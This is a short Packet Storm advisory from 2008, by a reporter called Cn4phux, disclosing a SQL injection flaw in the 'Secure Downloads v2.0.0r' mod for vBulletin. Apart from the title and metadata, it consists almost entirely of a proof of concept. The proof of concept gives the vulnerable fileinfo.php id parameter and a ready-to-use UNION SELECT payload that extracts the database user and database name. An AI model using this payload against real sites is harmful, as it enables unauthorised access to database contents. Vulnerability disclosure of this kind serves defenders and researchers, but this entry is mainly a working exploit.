Secure Downloads 2.0.0r SQL Injection

2008-12-09T00:00:00
ID PACKETSTORM:72753
Type packetstorm
Reporter Cn4phux
Modified 2008-12-09T00:00:00

Description

                                        
                                            `[~] vBulletin (Mode Secure Downloads v2.0.0r) SQL Injection Vulnerability  
  
[~] Mod : http://www.1src.com/freeware/download.php?id=1880  
  
[~] Author : Cn4phux  
  
[~] PoC :  
  
  
  
[~] URL.com/fileinfo.php?id=[SQL]  
  
  
[~] : 1797'+AND(0)+UNION+SELECT+1,1,1,1,1,'Cn4phux',0,0,0,1,0,1,0,0,0,0,0,USER(),DATABASE(),0,0,0,0,0,0,0+OR+'1'='0  
  
  
//Cn4phux.  
  
  
`